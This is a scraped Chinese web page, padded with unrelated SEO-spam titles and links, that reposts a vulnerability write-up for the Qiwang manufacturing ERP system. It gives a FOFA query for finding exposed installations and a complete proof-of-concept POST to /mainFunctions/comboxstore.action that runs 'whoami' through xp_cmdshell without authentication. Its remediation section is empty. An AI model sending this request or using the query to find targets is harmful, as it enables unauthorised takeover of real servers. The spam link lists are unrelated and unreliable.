当前位置: 首页 > news >正文

成都电子网站建设东莞seo整站优化火速

成都电子网站建设,东莞seo整站优化火速,泰安网络网站,网站搭建说明漏洞描述 由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。 免责声明 技术文章仅供参考,任何个人和组织…

漏洞描述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title="企望制造ERP系统"

漏洞复现

1.利用如下POC发起POST请求执行whoami命令得到回显


POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56comboxsql=exec%20xp_cmdshell%20'whoami'

在这里插入图片描述

修复方案

http://www.dt0577.cn/news/56936.html

相关文章:

  • win10网站开发怎么测试不建站平台哪家好
  • 扬中网站建设案例网站排名seo教程
  • 色彩 导航网站链爱交易平台
  • 合肥企业网站建设工作室互联网公司排名
  • 网站可以做软件检测吗企业推广软件
  • 哪个网站可以预约做头发的宣传网站站点最有效的方式是
  • 网站建设 网页做网站
  • .org做商业网站东莞seo优化公司
  • 为什么上传网站模板网站上没有文字和图片东莞疫情最新消息今天新增病例
  • 为什么做的网站别的浏览器打不开怎么办如何快速推广一个app
  • 中网建站seo关键词是什么
  • 怎样做网站备案做公司网页
  • 南宁网站建设 南宁联达亿搜索引擎营销ppt
  • 网站建设的指标百度一下一下你就知道
  • 北京vi设计公司哪国内seo做最好的公司
  • 微信公众号平台官网注册入口seo网络推广专员招聘
  • 中文网站开发开发一个小程序一般需要多少钱呢
  • WordPress 教育模板百度推广优化排名怎么收费
  • 翻译类公司网站模板无锡网站seo顾问
  • 网站建设 四川免费的网站关键词查询工具
  • 泰安工程建设信息网站seo的理解
  • 金坛网站制作搜索引擎关键词排名优化
  • 如何申请自己的网站seo需要什么技术
  • 光谷做网站推广哪家好最新国内新闻重大事件
  • 手机网站建设教程百度平台客服怎么联系
  • 营销型网站的类型有哪些网搜网
  • 济南seo网站优化公司网络营销外包推广
  • 网络营销的机遇和挑战网络营销企业网站优化
  • 网站源代码程序网页搜索排名提升
  • 成都电商网站制作新网站百度收录